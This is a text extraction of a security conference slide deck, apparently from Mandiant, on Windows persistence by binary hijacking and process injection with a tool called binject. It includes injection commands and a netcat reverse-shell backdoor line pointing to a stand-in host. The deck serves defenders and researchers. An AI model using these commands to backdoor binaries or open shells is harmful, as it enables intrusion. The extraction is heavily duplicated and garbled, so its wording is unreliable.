[PPT] - THE BLACK ART OF BINARY HIJACKING HIJACKING Agenda Agenda Agenda PowerPoint Presentation

SLIDE 1

Nick Harbour Principal Consultant

nick.harbour@mandiant.com ick.harbour@mandiant.com

THE BLACK ART OF BINARY HIJACKING

@

HIJACKING

SLIDE 2

Agenda Agenda

2

Agenda Agenda

Overview of Persistence Techniques

2

Overview of Persistence Techniques

Binary Hijacking with

Binary Hijacking with binject binject

− Adding Sections

Adding Sections

− Entry Point Redirection

Entry Point Redirection

− Import Poisoning

Import Poisoning

− TLS Callbacks

TLS Callbacks

− Adding pre

Adding pre-

made parasites

made parasites

Process Injection Parasites

New Methods for Process Injection

SLIDE 3

Windows Persistence Techniques Windows Persistence Techniques

3 Windows Persistence Techniques

Windows Persistence Techniques

3

Technique Install Detect Startup Folders Very Easy Very Easy Registry Run Keys Very Easy Very Easy Wi d S i E M di Windows Services Easy Medium Other Registry Hijacks Medium Medium Binary Hijacking Difficult Difficult DLL Search Order Hijacking* Easy Very Difficult

*For more info visit http://blog.mandiant.com/archives/1207

SLIDE 4

Introducing Binject Introducing Binject

4

Introducing Binject Introducing Binject

Very Simple Command Line Interface

4

Very Simple Command Line Interface Very Simple Command Line Interface

Point

Point-

and

and-

shoot Binary Hijacking

shoot Binary Hijacking

Add New Sections to a Binary

− Can Fully Rebuild PE binaries to make room

Can Fully Rebuild PE binaries to make room

Redirect Entry Point to new Section

− Raw (no pointer on stack)

Raw (no pointer on stack)

− Relative or Absolute pointer to OEP on the

Relative or Absolute pointer to OEP on the stack stack

− DLL Support

DLL Support

SLIDE 5

DLL Entry Point Redirection DLL Entry Point Redirection

5

DLL Entry Point Redirection DLL Entry Point Redirection

5

push 0FFFF3392h

D l OEP

push 0FFFF3392h pop eax $

Delta to OEP

call $+5 add [esp], eax

Get EIP Pointer to OEP L ft St k

Your Shellcode Here

Left on Stack

… Your Shellcode Here … ret

O

ret

Back to OEP

SLIDE 6

Import Table Poisoning Import Table Poisoning

6

Import Table Poisoning Import Table Poisoning

Force a binary to load your DLL

6

Force a binary to load your DLL

Your DLL will load first

Useful for API Hooking, sandboxing

binject ‐i clean.exe ‐o hacked.exe –m evil.dll

SLIDE 7

Adding a TLS Callback Adding a TLS Callback

7

Adding a TLS Callback Adding a TLS Callback

The Thread Local Storage (TLS) provides a

7

g ( ) p g ( ) p mechanism to call a function on the following mechanism to call a function on the following events: events:

P t t t t

− Process start

rocess start

− Thread start

hread start

− DLL attach

DLL attach DLL attach DLL attach

− Thread terminate

hread terminate

− Process terminate

Process terminate

Will Execute BEFORE the entry point of the

Will Execute BEFORE the entry point of the binary binary O l d if USER32 DLL i l d d O l d if USER32 DLL i l d d

Only used if USER32.DLL is loaded

binject ‐i clean exe ‐o hacked exe –d shellcode bin ‐‐tls binject ‐i clean.exe ‐o hacked.exe –d shellcode.bin ‐‐tls

SLIDE 8

Utility Wrapping Utility Wrapping

8

Utility Wrapping Utility Wrapping

Add a fixed command line to a binary

8

Add a fixed command line to a binary

− For example, hard code reverse shell switches

For example, hard code reverse shell switches

nto the netcat binary
nto the netcat binary
nto the netcat binary.
nto the netcat binary.

binject ‐i nc.exe –o backdoor.exe –c “fake.com 7777 –e cmd.exe”

Coming soon, Add a fixed standard input

Coming soon, Add a fixed standard input to a binary to a binary

SLIDE 9

Adding a Pre Adding a Pre Made Parasite Made Parasite

9

Adding a Pre Adding a Pre-Made Parasite Made Parasite

Shell

Shell-Code Payload Code Payload

9

Shell

Shell Code Payload Code Payload

− Process Inject Shellcode into a Target Process

Process Inject Shellcode into a Target Process

CreateRemoteThread() CreateRemoteThread() method method

CreateRemoteThread()

CreateRemoteThread() method method

QueueUserAPC()

QueueUserAPC() method method M i Th d Hij k th d ( ) M i Th d Hij k th d ( )

Main Thread Hijack method (new)

Main Thread Hijack method (new) Full EXE Payload

Full EXE Payload

− Dropper

Dropper Dropper Dropper

− In

In-

Memory Process Replacement

Memory Process Replacement

SLIDE 10

Basic Process Injection Techniques Basic Process Injection Techniques

10

Basic Process Injection Techniques Basic Process Injection Techniques

Memory must be allocated in remote

10

Memory must be allocated in remote

Memory must be allocated in remote process ( process (VirtualAllocEx VirtualAllocEx) D t t b itt t t D t t b itt t t

Data must be written to remote process

Data must be written to remote process (WriteProcessMemory WriteProcessMemory)

Remote process must execute newly

Remote process must execute newly Remote process must execute newly Remote process must execute newly written code written code

SLIDE 11

Controlling Execution Controlling Execution

11

Controlling Execution Controlling Execution

CreateRemoteThread()

11

CreateRemoteThread() CreateRemoteThread()

− Forces a new thread to be created at a

Forces a new thread to be created at a location of your choosing location of your choosing location of your choosing location of your choosing

− Most

Most traditional, well traditional, well-

known

known approach approach Al f ki ’ k Al f ki ’ k

− Always freakin’ works

Always freakin’ works

QueueUserAPC

QueueUserAPC() ()

− Force the process to add an asynchronous

Force the process to add an asynchronous procedure call (APC) of your choosing procedure call (APC) of your choosing

− Process must use APC style of programming

Process must use APC style of programming (hint: services.exe uses this) (hint: services.exe uses this)

SLIDE 12

Thread Hijacking Thread Hijacking New Technique New Technique

12

Thread Hijacking Thread Hijacking – New Technique New Technique

Find a thread to hijack

12

j j

Suspend the thread

Save the thread context with

Save the thread context with G t h dC t t() G t h dC t t() GetThreadContext() GetThreadContext()

Allocate space for your code and a stack

Allocate space for your code and a stack Write o r code to the process Write o r code to the process

Write your code to the process

SetThreadContext()

SetThreadContext() with EIP pointing to your with EIP pointing to your code and ESP pointing to the new stack code and ESP pointing to the new stack code and ESP pointing to the new stack code and ESP pointing to the new stack

ResumeThread()

Wait for the thread to suspend

Wait for the thread to suspend p

SetThreadContext()

SetThreadContext() back to the original back to the original

ResumeThread()

ResumeThread() () ()

SLIDE 13

Notes on Thread Hijacking Notes on Thread Hijacking

13

Notes on Thread Hijacking Notes on Thread Hijacking

Less memory forensic residue

13

Less memory forensic residue

− Thread is launched from valid executable

Thread is launched from valid executable range as opposed to remotely range as opposed to remotely range as opposed to remotely range as opposed to remotely

Injected code needs to suspend its thread

Injected code needs to suspend its thread when finished when finished

SLIDE 14

Demo and Q&A Demo and Q&A

14

Demo and Q&A Demo and Q&A

nick harbour@mandiant com

14